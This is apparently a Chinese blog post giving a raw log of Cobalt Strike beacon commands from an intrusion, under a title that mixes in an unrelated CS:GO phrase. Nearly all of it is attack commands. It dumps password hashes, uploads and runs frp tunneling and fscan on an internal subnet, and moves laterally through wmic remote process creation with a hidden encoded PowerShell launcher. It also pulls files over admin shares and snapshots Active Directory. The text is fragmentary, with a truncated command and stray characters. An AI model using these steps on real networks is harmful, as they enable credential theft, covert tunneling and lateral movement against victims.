一次实战CS上执行命令（csgo执行cfg指令）

hashdump

shell tasklist /svc |findstr 2468

shell wmic logicaldisk where drivetype=3 get deviceid

upload C:\Users\Alex\Desktop\tools\frp_0.37.1_windows_amd64\frpc.ini (C:\Users\Public\frpc.ini)

shell C:\Users\Public\frpc.exe -c C:\Users\Public\frpc.ini

upload C:\Users\Alex\Desktop\tools\fscan64.exe (C:\Users\Public\fscan64.exe)

shell C:\Users\Public\fscan64.exe -h 10.20.1.0/24

Link 10.20.1.5

shell wmic /node:10.20.1.5 os get name,OSArchitecture

shell wmic /node:10.20.1.5 process get processid,name

lost link to parent beacon: 192.9.210.4

[+] established link to parent beacon: 192.9.210.4

[*] Tasked beacon to sleep for 30s (30% jitter) [change made to: Beacon 192.9.210.4@5668]

shell wmic /node:10.20.1.9 process call create "cmd /c powershell -nop -w hidden -encodedcommand

v

download \\10.20.1.2\c$\Windows\win.ini-----------------

mkdir C:\Windows\Temp\temp

upload C:\Users\bighead\Desktop\ADExplorer.exe

shell C:\Windows\Temp\temp\ADExplorer.exe -snapshot "" C:\Windows\Temp\temp\ad.dat